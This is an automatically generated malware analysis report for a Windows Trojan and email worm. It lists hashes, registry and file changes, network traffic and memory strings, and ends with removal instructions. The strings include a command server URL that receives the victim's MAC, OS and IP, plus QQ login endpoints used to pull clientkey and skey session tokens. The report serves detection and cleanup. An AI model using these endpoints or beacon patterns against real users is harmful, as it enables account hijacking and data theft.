Trojan.Win32.FlyStudio_6fc6b0b524

by malwarelabrobot on August 29th, 2017 in Malware Descriptions.

Trojan.GenericKD.12105124 (BitDefender), Trojan:Win32/Tonmye.gen!A (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.GenericKD.12105124 (B) (Emsisoft), Generic.cfo (McAfee), Trojan.Gen.6 (Symantec), Trojan.GenericKD.12105124 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08JC0CH817 (TrendMicro), GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, Malware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 6fc6b0b5248b8307ff5fc7af691eedfe
SHA1: 09eaa9028adcc0b77891884ce397d3aac98942d1
SHA256: 6eaba6ab386687e5a2c0313d9199e18cce726b962eac2fa11c6b60e943f484af
SSDeep: 6144:/VezUT wSgeWwuxnkJcrnzhfndRQypV7QGVnsAVHYyvRT3Ie x3nzOpOS:7bwuSJc7zhfnd UQ8nn5YyvRLIpXmOS
Size: 384512 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-27 10:43:15
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:600

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ic[1].htm (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F46C.tmp (7971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F509.tmp (5873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F5C5.tmp (1425 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F46C.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F509.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F5C5.tmp (0 bytes)

Registry activity

The process %original file name%.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\6fc6b0b5248b8307ff5fc7af691eedfe_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	737280	316416	5.54449	00823a7d92084311acbf80b6e00601a6
.rdata	741376	90112	27136	5.54021	2759a1bdde240b9a45a779f31a06d8e6
.data	831488	303104	23040	5.53647	750c22bdd8d8cfd2d4f5480cc958a2d7
.rsrc	1134592	24576	7680	4.4743	4b2a65d9af389674e8d58597a98ee443
.aspack	1159168	12288	9216	3.69543	c82d8180f74cf65b1c5ef7ae85873488
.adata	1171456	4096	0	0	d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

ebe2b9b81a906ea9eb1f48e9f63f9a70

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://1212.ip138.com/ic.asp	183.238.101.232
hxxp://113.17.184.163/love/cpa06.asp?mac=00:50:56:3B:AE:AC&os=Windows 7&ip=194.242.96.218&dz=316332277313300274

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /ic.asp HTTP/1.1

Accept: */*

Referer: hXXp://1212.ip138.com/ic.asp

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: 1212.ip138.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Mon, 28 Aug 2017 11:04:10 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 219

Content-Type: text/html

Set-Cookie: ASPSESSIONIDASQRBTQB=IILLCCOBHMGPMOLCNNJGGFHL; path=/

Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.218] ............</center></body></htm
l>HTTP/1.1 200 OK..Date: Mon, 28 Aug 2017 11:04:10 GMT..Server: Mic
rosoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 219..Content-Ty
pe: text/html..Set-Cookie: ASPSESSIONIDASQRBTQB=IILLCCOBHMGPMOLCNNJGGF
HL; path=/..Cache-control: private..<html>..<head>..<me
ta http-equiv="content-type" content="text/html; charset=gb2312">..
<title> ....IP.... </title>..</head>..<body style
="margin:0px"><center>....IP....[194.242.96.218] ............
</center></body></html>..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_600:

.text

`.rdata

@.data

.rsrc

.aspack

.adata

t$(SSh

u.hXeM

~%UVW

u$SShe

ws2_32.dll

IPHLPAPI.DLL

oleaut32.dll

ole32.dll

OleAut32.dll

kernel32.dll

ntdll.dll

wininet.dll

user32.dll

shlwapi.dll

gdi32.dll

Kernel32.dll

Shlwapi.dll

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

MsgWaitForMultipleObjects

MapVirtualKeyA

113.17.184.163

/love/cpa06.asp?mac=

hXXp://

{4590f811-1d3a-11d0-891f-00aa004b2e24}

{dc12a687-737f-11cf-884d-00aa004b2e24}

@Windows 10

Windows Server Technical Preview

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

Windows 8

Windows Server 2012

Windows 8.1

Windows Server 2012 R2

Windows 2000

Windows XP

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Windows 98

Web Server Edition

SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild

hXXp://1212.ip138.com/ic.asp

https

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

http=

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

hXXps://

5B3838F5-0C81-46D9-A4C0-6EA28CA3E942

/mac2/hy.txt

hXXp://113.17.184.163/love/api.asp?type=a

Common.dll

@`AMainFrame.dll

.@&website=VVV.qq.com

&fromSubId=1&subcmd=all&uin=

/love/api.asp?type=b&uid=

/mac2/yqh.txt

hXXp://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.7478418888058513&pt_local_tk=0.3858416392467916

hXXp://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=

clientkey

&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

p_uin=; p_skey=; pt4_token=;

length = str.length; i < length; i  ) {

hash = hash * 33   str.charCodeAt(i)

hXXp://ptlogin2.qq.com/pt4_auth?daid=73&appid=715030901&auth_token=

®master=&aid=715030901&s_url=http://connect.qq.com/widget/shareqq/success.html

; skey=

hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?groupcount=4&count=4&callbackFun=_GetGroupPortal&uin=

hXXp://qun.qq.com/cgi-bin/qun_mgr/add_group_member

WinHttp.WinHttpRequest.5.1

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

RASAPI32.dll

GetProcessHeap

WinExec

KERNEL32.dll

GetKeyState

USER32.dll

GetViewportOrgEx

GDI32.dll

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

OLEAUT32.dll

COMCTL32.dll

WSOCK32.dll

InternetCrackUrlA

InternetCanonicalizeUrlA

WININET.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

VVV.dywt.com.cn

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

right-curly-bracket

left-curly-bracket

<small>Host by <a href="hXXp://VVV.netbox.cn" target="_blank">NetBox Version 2.8 Build 4128</a></small>

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

The procedure entry point %s could not be located in the dynamic link library %s

The ordinal %u could not be located in the dynamic link library %s

winmm.dll

rasapi32.dll

winspool.drv

advapi32.dll

shell32.dll

comctl32.dll

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

(*.*)

%original file name%.exe_600_rwx_0051B000_00002000:

kernel32.dll

user32.dll

The procedure entry point %s could not be located in the dynamic link library %s

The ordinal %u could not be located in the dynamic link library %s

winmm.dll

ws2_32.dll

rasapi32.dll

gdi32.dll

winspool.drv

advapi32.dll

shell32.dll

ole32.dll

oleaut32.dll

comctl32.dll

wininet.dll

comdlg32.dll

RegCloseKey

ShellExecuteA

InternetCanonicalizeUrlA

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ic[1].htm (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F46C.tmp (7971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F509.tmp (5873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F5C5.tmp (1425 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.